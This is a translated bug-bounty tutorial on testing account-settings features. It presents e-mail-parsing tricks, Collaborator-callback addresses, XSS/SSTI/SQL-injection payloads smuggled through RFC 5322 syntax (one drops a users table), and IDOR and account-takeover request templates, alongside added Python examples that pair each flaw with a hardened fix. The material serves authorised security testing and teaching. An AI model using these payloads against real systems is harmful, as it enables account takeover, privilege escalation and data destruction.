Bug Bounty Hunter Series: How to Test the Settings Feature, Part II
Disclaimer: the programs and methods described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; the author accepts no legal or joint liability.
Main text
This is the second installment in the series; the previous installment:
Method 8
If the target application lets you add a second (secondary) e-mail address, try adding a company address such as [email protected]. Applications that key privileges off the address domain may grant you the additional rights reserved for company accounts. The request looks like:
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&action=add&token=CSRF
Method 9
Same feature, but this time use an address containing two '@' signs, such as [email protected]@company.com. A check that only looks at the trailing @company.com treats it as a company address, while the mail layer may take the part before the second '@' as the real recipient, so you can pick up the extra privileges and still receive the mail yourself:
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]@company.com&action=add&token=CSRF
Method 10
Same feature, but add addresses built around a Burp Collaborator host. A DNS or SMTP interaction at the Collaborator shows that the back end resolved or delivered to a host you control, and whatever it sends there (verification mails, internal headers) may expose sensitive back-end information. Shapes to try:
[email protected]
user(;[email protected])@gmail.com
[email protected](@gmail.com)
me+(@gmail.com)@id.collaborator.net
<[email protected]>[email protected]
Method 11
Same feature, but try the payloads below. RFC 5322 allows a quoted local part and comments inside an address, so many of these pass validation unchanged and reach templates, mail bodies or SQL queries as-is; XSS, SSTI or SQLi may be waiting there:
me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
me@gmail(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com
me@[id.collaborator.net]
%@gmail.com
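The following is an added example, not code from the original post, showing the parsing gap that methods 9, 10 and 11 above exploit. It assumes a weak application-side check modelled as "the raw string contains @allowed-domain" (`loose_allowlisted`), and `mta_recipient` is a deliberately simplified model of how a lenient RFC 5322 consumer reads the stored string (comments dropped, quoted local part kept verbatim, angle-addr wins, domain stops at the next special); it is not any real MTA's code, and escaped quotes are not modelled. The payloads in `PAYLOADS` are constructed in the shapes listed above, with `id.collaborator.net` as a placeholder host.

```python
# Added example (not from the original post): the app validates the raw string
# with a loose test, the mail layer re-reads it as RFC 5322, and when the two
# readings disagree mail (or a privilege) goes to a host the tester controls.
# mta_recipient() is a simplified model of that second reading, not a real MTA.
import re

def _strip_comments(s: str) -> str:
    """Remove (possibly nested) RFC 5322 comments that sit outside quoted strings."""
    out, depth, quoted, i = [], 0, False, 0
    while i < len(s):
        c = s[i]
        if quoted:
            if c == '\\' and i + 1 < len(s):       # keep an escaped character verbatim
                out.append(s[i:i + 2])
                i += 2
                continue
            if c == '"':
                quoted = False
            out.append(c)
        elif depth:                                # inside a comment: drop everything
            depth += (c == '(') - (c == ')')
        elif c == '(':
            depth = 1
        else:
            if c == '"':
                quoted = True
            out.append(c)
        i += 1
    return ''.join(out)

def _angle_addr(s: str):
    """Contents of the first <...> outside quoted strings, else None."""
    quoted = False
    for i, c in enumerate(s):
        if c == '"':
            quoted = not quoted
        elif c == '<' and not quoted:
            end = s.find('>', i + 1)
            return s[i + 1:end] if end != -1 else None
    return None

def mta_recipient(addr: str):
    """(local_part, domain) a lenient mail layer would deliver to, or None."""
    s = _strip_comments(addr).strip()
    inner = _angle_addr(s)
    if inner is not None:
        s = inner.strip()
    if s.startswith('"'):                          # quoted local part, may contain '@'
        end = s.find('"', 1)
        if end == -1:
            return None
        local, rest = s[:end + 1], s[end + 1:]
    else:                                          # first '@' splits local from domain
        local, sep, rest = s.partition('@')
        rest = sep + rest
    if not local or not rest.startswith('@'):
        return None
    rest = rest[1:]
    if rest.startswith('['):                       # domain literal such as [203.0.113.5]
        end = rest.find(']')
        domain = rest[:end + 1] if end != -1 else ''
    else:                                          # domain stops at the next special, so a
        m = re.match(r'[A-Za-z0-9.-]+', rest)      # second '@' and everything after it is ignored
        domain = m.group(0) if m else ''
    return (local, domain) if domain else None

def loose_allowlisted(addr: str, allowed: str) -> bool:
    """The weak check modelled here: 'the raw string contains @allowed-domain'."""
    return re.search('@' + re.escape(allowed) + r'\b', addr, re.I) is not None

def strict_allowlisted(addr: str, allowed: str) -> bool:
    """Hardened check: one '@', no ambiguity-creating RFC 5322 syntax, whole domain compared."""
    if addr.count('@') != 1 or re.search(r'[()<>"\[\]\\,;:\s]', addr):
        return False
    local, _, domain = addr.partition('@')
    return bool(local) and domain.lower() == allowed.lower()

def classify(addr: str, allowed: str) -> dict:
    """What the app believes versus where the mail layer would actually send."""
    parsed = mta_recipient(addr)
    delivers_to = parsed[1].lower() if parsed else None
    accepted = loose_allowlisted(addr, allowed)
    return {'loose_accepts': accepted,
            'strict_accepts': strict_allowlisted(addr, allowed),
            'delivers_to': delivers_to,
            'bypass': accepted and delivers_to != allowed.lower()}

PAYLOADS = [  # constructed; id.collaborator.net is a placeholder host
    ('attacker@evil.net@company.com', 'company.com'),        # double '@' (method 9)
    ('me+(@gmail.com)@id.collaborator.net', 'gmail.com'),    # comment hides the real domain
    ('me@id.collaborator.net(@company.com)', 'company.com'), # comment after the domain
    ('<me@id.collaborator.net>me@company.com', 'company.com'),
    ('"me@company.com"@id.collaborator.net', 'company.com'), # quoted local part with '@'
    ('"<script>alert(0)</script>"@gmail.com', 'gmail.com'),  # RFC-valid; payload reaches the sink
    ('alice@company.com', 'company.com'),                    # legitimate control case
]
```

Running `classify(addr, allowed)` over `PAYLOADS` shows the first five entries accepted by the loose check yet delivered to `evil.net` or the Collaborator host, the `<script>` entry accepted by the loose check (so the raw string reaches storage and templates) and rejected by the strict one, and only `alice@company.com` passing both. The practical lesson for defenders is that the allowlist test must run on the same normalized form the mail layer uses, and should simply refuse any address carrying comment, quote or angle-bracket syntax or more than one '@'.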
Method 12
If editing is keyed by UUID, submit the UUID of another account and check for an IDOR:
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&uuid=UUID-Of-Another-Account&token=CSRF
Method 13
When changing the account e-mail from [email protected] to [email protected], check whether the verification code is also delivered to the old address ([email protected]). If it is, the new address gets bound without its owner ever proving control of it, which is an account-takeover vulnerability:
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
[email protected]&token=CSRF
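The following is an added example, not code from the original post, of the e-mail-change flow that method 13 tests, with the flaw and the fix side by side. It assumes an in-memory outbox standing in for SMTP, an `Account` object with a single pending change, and placeholder addresses (`attacker@evil.example`, `victim@company.com`); nothing here is taken from any real application.

```python
# Added example (not from the original post): both flows issue a one-time code
# when a user asks to change the address on the account.  The vulnerable flow
# also mails that code to the CURRENT address, so whoever controls the current
# address (the attacker, on their own account) can bind a new address without
# its owner ever seeing the code.  The hardened flow mails the code to the new
# address only and sends the old address a notice that carries no code.
# Delivery is simulated with an in-memory outbox; all addresses are placeholders.
import hmac
import secrets
import time

OUTBOX = []   # (recipient, subject, body) tuples standing in for SMTP


def _send(to: str, subject: str, body: str) -> None:
    OUTBOX.append((to, subject, body))


class Account:
    def __init__(self, email: str):
        self.email = email
        self.pending = None        # (new_email, code, expires_at) while a change is open


def start_change(account: Account, new_email: str, leak_to_old_address: bool, ttl: int = 600) -> str:
    """Begin an e-mail change; leak_to_old_address=True reproduces the flaw."""
    code = f'{secrets.randbelow(10 ** 6):06d}'
    account.pending = (new_email, code, time.time() + ttl)
    _send(new_email, 'Confirm your new address', f'Your code is {code}')
    if leak_to_old_address:
        # vulnerable: the same code is copied to the address being replaced
        _send(account.email, 'Confirm your new address', f'Your code is {code}')
    else:
        # hardened: the old address is informed but learns nothing usable
        _send(account.email, 'E-mail change requested',
              f'A change to {new_email} was requested. If this was not you, contact support.')
    return code


def confirm_change(account: Account, submitted_code: str, now=None) -> bool:
    """Bind the pending address only for a fresh, matching code."""
    if account.pending is None:
        return False
    new_email, code, expires_at = account.pending
    now = time.time() if now is None else now
    if now > expires_at or not hmac.compare_digest(code, submitted_code):
        return False
    account.email = new_email
    account.pending = None
    return True


def codes_seen_by(address: str) -> list:
    """Every code delivered to `address`, i.e. what its holder can read."""
    return [body.split()[-1] for to, _, body in OUTBOX
            if to == address and body.startswith('Your code is')]


def attacker_can_bind(victim_address: str, leak_to_old_address: bool) -> bool:
    """Method 13 end to end: from an account the attacker controls, try to bind
    victim_address while reading only the attacker's own mailbox."""
    OUTBOX.clear()
    acct = Account('attacker@evil.example')
    start_change(acct, victim_address, leak_to_old_address)
    for code in codes_seen_by('attacker@evil.example'):
        if confirm_change(acct, code):
            return acct.email == victim_address
    return False


if __name__ == '__main__':
    print('vulnerable flow, attacker binds victim address:', attacker_can_bind('victim@company.com', True))
    print('hardened flow,   attacker binds victim address:', attacker_can_bind('victim@company.com', False))
```

In the vulnerable flow `attacker_can_bind` succeeds because the code lands in the attacker's own mailbox; in the hardened flow the attacker only ever sees the notice. A production implementation would additionally rate-limit `confirm_change` (a six-digit code is brute-forceable without it) and require the user to re-authenticate before starting the change.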
Method 14
If there is an edit function keyed by phone number, such as changing the password, submit another account's phone number and test for an IDOR:
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
newPass=****&phone=Phone-Another-Account&token=CSRF
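The following is an added example, not code from the original post, of the authorization flaw behind methods 12 and 14 next to its fix. The user store, session identifiers (`uuid-attacker`, `uuid-victim`), phone numbers and request bodies are all constructed for the example; the bodies reuse the parameter names shown in the two requests above (`uuid`, `phone`, `newPass`, `token`), and no web framework is involved.

```python
# Added example (not from the original post): a settings handler that picks
# the record to modify from an identifier in the request body (uuid, phone)
# lets any logged-in user edit any other user's row once that identifier is
# known or guessed.  The fix derives the target from the authenticated session
# and treats a client-supplied identifier purely as something to cross-check.
# The user store, session ids and request bodies are all constructed here.
from urllib.parse import parse_qs


def fresh_users() -> dict:
    """Constructed user store keyed by UUID (plain dicts for brevity)."""
    return {
        'uuid-attacker': {'email': 'attacker@evil.example', 'phone': '+15550000001', 'password': 'attacker-pw'},
        'uuid-victim':   {'email': 'victim@company.com',    'phone': '+15550000002', 'password': 'victim-pw'},
    }


def _form(body: str) -> dict:
    """Decode an x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def _apply(target: dict, form: dict) -> str:
    """Write the editable fields; shared by both handlers."""
    if 'email' in form:
        target['email'] = form['email']
    if 'newPass' in form:
        target['password'] = form['newPass']
    return 'ok'


def settings_vulnerable(users: dict, session_user_id: str, body: str) -> str:
    """Trusts the identifier in the body: the IDOR the two methods probe for."""
    form = _form(body)
    if 'uuid' in form:                                   # method 12: edit by UUID
        target = users.get(form['uuid'])
    elif 'phone' in form:                                # method 14: password by phone number
        target = next((u for u in users.values() if u['phone'] == form['phone']), None)
    else:
        target = users[session_user_id]
    if target is None:
        return 'not found'
    return _apply(target, form)


def settings_hardened(users: dict, session_user_id: str, body: str) -> str:
    """Only ever edits the caller's own record; an identifier that does not
    match the session is refused instead of being followed to another row."""
    form = _form(body)
    me = users[session_user_id]
    if form.get('uuid', session_user_id) != session_user_id:
        return 'forbidden'
    if form.get('phone', me['phone']) != me['phone']:
        return 'forbidden'
    return _apply(me, form)


def victim_compromised(handler) -> dict:
    """Replay the two attacker requests from methods 12 and 14 against a
    handler while logged in as the attacker, and report what changed."""
    users = fresh_users()
    r1 = handler(users, 'uuid-attacker', 'email=attacker@evil.example&uuid=uuid-victim&token=CSRF')
    r2 = handler(users, 'uuid-attacker', 'newPass=pwned&phone=%2B15550000002&token=CSRF')
    victim = users['uuid-victim']
    return {'responses': (r1, r2),
            'email_hijacked': victim['email'] == 'attacker@evil.example',
            'password_reset': victim['password'] == 'pwned'}


if __name__ == '__main__':
    print('vulnerable:', victim_compromised(settings_vulnerable))
    print('hardened:  ', victim_compromised(settings_hardened))
```

Against `settings_vulnerable` both replayed requests return `ok` and the victim's e-mail and password are rewritten; against `settings_hardened` both are refused and the victim's row is untouched, while the attacker can still edit their own record. The hardened handler is only the authorization half of the fix: a password change should also demand the current password, a new e-mail address should go through ownership verification, and the CSRF token visible in the page's requests must be checked before any of this runs.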
References
https://hackerone.com/reports/565883
https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses
HTML injection in e-mails is pretty common, but did you know you can escalate it to stored XSS in many cases? Just open the 'online version' to get that sweet pop-up! 😎 Thanks for the #BugBountyTip, @renniepak! #HackWithIntigriti pic.twitter.com/Qa3xoCBsGb
— INTIGRITI (@intigriti) October 20, 2020
https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
https://hackerone.com/reports/95552
https://hackerone.com/reports/950881
https://hackerone.com/reports/969223
https://hackerone.com/reports/974222
https://hackerone.com/reports/791775
Originally published on the WeChat official account 迪哥讲事 as: 漏洞赏金猎人系列-如何测试设置(Setting)功能II